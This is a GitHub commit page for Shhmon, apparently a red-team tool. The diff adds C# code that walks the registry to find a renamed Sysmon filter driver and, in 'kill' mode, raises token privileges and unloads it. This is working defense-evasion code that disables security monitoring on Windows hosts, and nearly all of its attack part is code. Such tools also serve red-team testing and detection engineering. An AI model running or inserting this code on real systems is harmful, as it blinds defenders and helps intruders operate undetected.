Skip to content

Commit

Permalink
Added logic to handle when Sysmon's driver name is changed and set to…
Browse files Browse the repository at this point in the history 
… run at a different altitude

This technique walks the registry looking for a subkey of "Sysmon Instance" and pulls the altitude from that.
  • Loading branch information
@matterpreter
matterpreter committed Sep 16, 2019
1 parent a45973c commit 36ad7a9
Show file tree
Hide file tree
Showing 2 changed files with 67 additions and 3 deletions.
31 changes: 31 additions & 0 deletions Shhmon/FilterParser.cs
View file
Original file line number Diff line number Diff line change
Expand Up @@ -2,6 +2,7 @@
using System.Collections.Generic;
using System.Runtime.InteropServices;
using System.Text;
using Microsoft.Win32;

namespace Shhmon
{
Expand Down Expand Up @@ -144,6 +145,36 @@ private static IEnumerable<FilterInfo> MarshalFilterInfo(IntPtr ptr)

return result;
}

public static void WalkRegistryKeys(out string altName, out string altitude)
{
altName = null;
altitude = null;

RegistryKey hklm = Registry.LocalMachine;
RegistryKey services = hklm.OpenSubKey(@"SYSTEM\CurrentControlSet\Services");

foreach (string service in services.GetSubKeyNames())
{
RegistryKey serviceSubkey = services.OpenSubKey(service);
foreach (string subkeyName in serviceSubkey.GetSubKeyNames())
{
if (subkeyName.Contains("Instances"))
{
RegistryKey servicesSubsubkey = serviceSubkey.OpenSubKey(subkeyName);
foreach (string subsubkeyName in servicesSubsubkey.GetSubKeyNames())
{
if (subsubkeyName.Equals("Sysmon Instance"))
{
RegistryKey sysmonAltitude = servicesSubsubkey.OpenSubKey(subsubkeyName);
altitude = sysmonAltitude.GetValue("Altitude").ToString();
altName = service;
}
}
}
}
}
}
}

}
39 changes: 36 additions & 3 deletions Shhmon/Program.cs
View file
Original file line number Diff line number Diff line change
Expand Up @@ -9,6 +9,12 @@ class Program
{
static void Main(string[] args)
{
if (args.Length < 1)
{
Console.WriteLine("[-] Missing args");
Console.WriteLine("[-] Usage: Shhmon.exe <hunt|kill>");
Environment.Exit(1);
}
if (args[0] == "hunt" || args[0] == "kill")
{
if (!IsAdmin())
Expand Down Expand Up @@ -37,12 +43,13 @@ static void Main(string[] args)
status = Win32.FilterUnload(filter.Name);
if (!status.Equals(0))
{
Console.WriteLine("[-] Driver unload failed");
Console.WriteLine("[-] Driver unload failed - Error: {0}", String.Format("{0:X}", status));
}
else
{
Console.WriteLine("[+] SysmonDrv was unloaded :)");
}

}

}
Expand All @@ -57,7 +64,8 @@ static void Main(string[] args)
status = Win32.FilterUnload(filter.Name);
if (!status.Equals(0))
{
Console.WriteLine("[-] Driver unload failed");
Console.WriteLine("[-] Driver unload failed - Error: {0}", String.Format("{0:X}", status));

}
else
{
Expand All @@ -69,7 +77,32 @@ static void Main(string[] args)
}
if (!found)
{
Console.WriteLine("[-] No driver found at altitude 385201");
Console.WriteLine("[-] No driver found at altitude 385201. Checking for Sysmon running at a different altitude.");

FilterParser.WalkRegistryKeys(out string altName, out string altitude);
if (!string.IsNullOrWhiteSpace(altName) && !string.IsNullOrWhiteSpace(altitude))
{
Console.WriteLine("[+] Found Sysmon running as {0} at altitude {1}", altName, altitude);
if (args[0] == "kill")
{
Console.WriteLine("[+] Trying to kill the driver...");
Win32.OpenProcessToken(Process.GetCurrentProcess().Handle, Win32.TOKEN_ALL_ACCESS, out currentProcessToken);
Tokens.SetTokenPrivilege(ref currentProcessToken);
status = Win32.FilterUnload(altName);
if (!status.Equals(0))
{
Console.WriteLine("[-] Driver unload failed - Error: {0}", String.Format("{0:X}", status));
}
else
{
Console.WriteLine("[+] {0} was unloaded :)", altName);
}
}
}
}
else
{
Console.WriteLine("[-] Sysmon does not appear to be installed");
}
}
else
Expand Down

0 comments on commit 36ad7a9

Please sign in to comment.